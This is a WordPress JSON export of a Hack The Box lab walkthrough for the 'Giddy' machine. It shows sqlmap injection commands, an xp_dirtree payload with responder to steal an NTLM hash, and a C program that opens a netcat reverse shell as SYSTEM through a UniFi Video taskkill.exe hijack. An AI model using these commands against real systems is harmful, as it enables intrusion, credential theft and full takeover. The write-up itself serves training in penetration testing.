{"id":41,"date":"2021-02-10T10:11:52","date_gmt":"2021-02-10T10:11:52","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=41"},"modified":"2021-02-10T10:23:25","modified_gmt":"2021-02-10T10:23:25","slug":"htb-giddy-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-giddy-walkthrough\/","title":{"rendered":"HTB – Giddy Walkthrough"},"content":{"rendered":"\n

nmap<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

 gobuster<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Search field – SQL error<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

SQL Injection
You can use the cheatsheet of PentestMonkeyhttp:\/\/pentestmonkey.net\/cheat-sheet\/sql-injection\/mssql-sql-injection-cheat-sheet<\/a>
or you can use sqlmap
sqlmap –url https:\/\/10.10.10.104\/mvc\/Product.aspx?ProductSubCategoryId=1<\/a> –dbms=mssql –dbs<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

databases<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

 current usersqlmap –url https:\/\/10.10.10.104\/mvc\/Product.aspx?ProductSubCategoryId=1<\/a> –dbms=mssql –current-user<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Capture MSSQL credentials with xp_dirtree, smbserver.py
Following blogspost explains the process very goodhttps:\/\/medium.com\/@markmotig\/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478<\/a>
=1; EXEC MASTER.sys.xp_dirtree ‘\\\\yourIP\\something’<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

listen with responder to steal the user hash
responder -I tun0<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Crack NTML hash<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\/remote Powershell Login<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

Search for unifivideo on searchsploit<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Exploit – Step by Step
Ubiquiti UniFi Video for Windows is installed to “C:\\ProgramData\\unifi-video\\”by default and is also shipped with a service called “Ubiquiti UniFi Video”.<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

 Its executable “avService.exe” is placed in the same directory and also runs underthe NT AUTHORITY\/SYSTEM account.<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

However the default permissions on the “C:\\ProgramData\\unifi-video” folder areinherited from “C:\\ProgramData” and are not explicitly overridden, which allowsall users, even unprivileged ones, to append and write files to the applicationdirectory:c:\\ProgramData>icacls unifi-video<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Upon start and stop of the service, it tries to load and execute the file at “C:\\ProgramData\\unifi-video\\taskkill.exe”. However this file does not exist in the application directory by default at all.By copying an arbitrary “taskkill.exe” to “C:\\ProgramData\\unifi-video\\” as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY\/SYSTEM.<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

Even when I encrypt the exploit, an AV probably catches it.<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

So I used the following C code to get root shell<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

#include <stdlib.h>int main () {system(“nc.exe -e cmd.exe <myip> <myport>”);return 0;}
# compile the C codei686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
Send taskkill.exe and nc.exe over SimpleHTTPServer<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Stop the service<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Wait for the Admin shell<\/p>\n\n\n\n

\"\"\/<\/figure>\n","protected":false},"excerpt":{"rendered":"

nmap  gobuster Search field – SQL error SQL InjectionYou can use the cheatsheet of PentestMonkeyhttp:\/\/pentestmonkey.net\/cheat-sheet\/sql-injection\/mssql-sql-injection-cheat-sheetor you can use sqlmapsqlmap –url https:\/\/10.10.10.104\/mvc\/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –dbs databases  current usersqlmap –url https:\/\/10.10.10.104\/mvc\/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –current-user Capture MSSQL credentials with xp_dirtree, smbserver.pyFollowing blogspost explains the process very goodhttps:\/\/medium.com\/@markmotig\/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478=1; EXEC MASTER.sys.xp_dirtree ‘\\\\yourIP\\something’ listen with responder to steal the user hashresponder -I tun0… Continue reading HTB – Giddy Walkthrough<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/41"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=41"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/41\/revisions"}],"predecessor-version":[{"id":42,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/41\/revisions\/42"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=41"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=41"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=41"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}